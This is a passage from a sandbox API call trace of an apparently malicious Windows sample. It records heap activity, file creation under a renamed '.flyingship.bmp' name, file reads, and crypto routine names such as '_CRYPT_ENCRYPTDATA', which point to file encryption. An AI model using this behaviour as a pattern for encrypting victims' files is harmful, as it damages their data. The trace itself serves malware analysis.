Flags=0x0, Size=0x38) returned 0x90af58 [0161.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa95010 [0161.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyejktglaf.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.800] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0161.800] TranslateMessage (lpMsg=0x87f36c) returned 0 [0161.800] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0161.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.801] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0161.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.801] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0161.801] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0161.801] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0161.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0161.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0161.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0161.803] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0161.803] ReadFile (in: hFile=0x138, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0161.807] ReadFile (in: hFile=0x138, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87efb8*=0x5f5a, lpOverlapped=0x0) returned 1 [0161.807] ReadFile (in: hFile=0x138, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0161.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15f5a) returned 0x9c5180 [0161.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0161.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15f5a) returned 0x9db0e8 [0161.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.811] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0161.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15f5a) returned 0x9c5180 [0161.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.812] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0161.812] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.812] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15f5a) returned 0x9c5180 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0161.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15f5a) returned 0x9f1050 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0161.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0161.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.815] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0161.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0161.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.815] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.816] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.817] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: 